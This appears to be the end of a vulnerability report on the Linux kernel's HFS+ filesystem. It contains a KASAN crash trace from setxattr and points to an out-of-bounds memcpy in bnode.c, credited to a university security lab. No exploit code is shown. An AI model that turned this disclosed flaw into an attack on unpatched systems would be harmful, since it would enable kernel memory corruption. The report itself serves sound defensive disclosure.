[  278.854206]  ? path_setxattr+0x134/0x170
[  278.855034]  ? __x64_sys_setxattr+0x6d/0x80
[  278.855898]  ? do_syscall_64+0x78/0x170
[  278.856694]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  278.857771]  ? save_stack+0xb5/0xd0
[  278.858501]  ? save_stack+0x46/0xd0
[  278.859226]  ? __kasan_slab_free+0x13c/0x1a0
[  278.860106]  ? kasan_slab_free+0xe/0x10
[  278.860901]  ? kmem_cache_free+0x89/0x1e0
[  278.861731]  ? putname+0x80/0x90
[  278.862421]  ? filename_lookup+0x191/0x280
[  278.863268]  ? kasan_unpoison_shadow+0x36/0x50
[  278.864181]  ? kasan_kmalloc+0xad/0xe0
[  278.864960]  ? kmem_cache_alloc_trace+0x102/0x200
[  278.865940]  hfsplus_setxattr+0x8a/0xb0
[  278.866734]  hfsplus_user_setxattr+0x27/0x30
[  278.867616]  __vfs_setxattr+0x7c/0xa0
[  278.868378]  __vfs_setxattr_noperm+0x8d/0x200
[  278.869275]  vfs_setxattr+0xb3/0xc0
[  278.870013]  setxattr+0x1b3/0x260
[  278.870706]  ? vfs_setxattr+0xc0/0xc0
[  278.871465]  ? filename_lookup+0x191/0x280
[  278.872307]  ? filename_parentat+0x2b0/0x2b0
[  278.873186]  ? kasan_kmalloc+0xad/0xe0
[  278.873976]  ? kasan_check_write+0x14/0x20
[  278.874831]  ? strncpy_from_user+0xa8/0x1c0
[  278.875700]  ? __mnt_is_readonly.part.13+0x23/0x30
[  278.876686]  ? __mnt_want_write+0x9d/0xb0
[  278.877516]  path_setxattr+0x134/0x170
[  278.878306]  ? setxattr+0x260/0x260
[  278.879037]  ? vm_brk+0x20/0x20
[  278.879695]  __x64_sys_setxattr+0x6d/0x80
[  278.880524]  do_syscall_64+0x78/0x170
[  278.881289]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  278.882338] RIP: 0033:0x7f5a927e71fa
[  278.883079] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48
[  278.886915] RSP: 002b:00007ffd01ecc4f8 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc
[  278.888448] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5a927e71fa
[  278.889903] RDX: 00007ffd01ecc520 RSI: 00000000004008a4 RDI: 0000000000d55080
[  278.891341] RBP: 00007ffd01ecc5a0 R08: 0000000000000001 R09: 0000000000000000
[  278.892780] R10: 0000000000000071 R11: 0000000000000202 R12: 00000000004005e0
[  278.894234] R13: 00007ffd01ecc6a0 R14: 0000000000000000 R15: 0000000000000000
[  278.895683] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[  278.905583] ---[ end trace 7f5a46c7478f1297 ]---
[  278.906815] RIP: 0010:__memcpy+0x12/0x20
[  278.907624] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4
[  278.911448] RSP: 0018:ffff8801e8db7430 EFLAGS: 00010246
[  278.912514] RAX: a805570000016000 RBX: 0000000000001000 RCX: 0000000000000200
[  278.913989] RDX: 0000000000000000 RSI: 700556c000016000 RDI: a805570000016000
[  278.915422] RBP: ffff8801e8db7450 R08: ffffed003e09c499 R09: ffffed003e09c499
[  278.916845] R10: 0000000000000001 R11: ffffed003e09c498 R12: a805570000016000
[  278.918316] R13: 700556c000016000 R14: ffff8801e082db60 R15: 0000000000001000
[  278.919754] FS:  00007f5a92cc6700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  278.921366] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  278.922571] CR2: 00007f828de0901a CR3: 00000001e5612000 CR4: 00000000000006f0

- Location
https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/hfsplus/bnode.c#L152
		while ((len -= l) != 0) {
			l = min_t(int, len, PAGE_SIZE);
			memcpy(kmap(*++dst_page), kmap(*++src_page), l);
			kunmap(*src_page);
			set_page_dirty(*dst_page);
			kunmap(*dst_page);
		}
The out-of-bounds access happens in this memcpy(), as KASAN reports.

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.
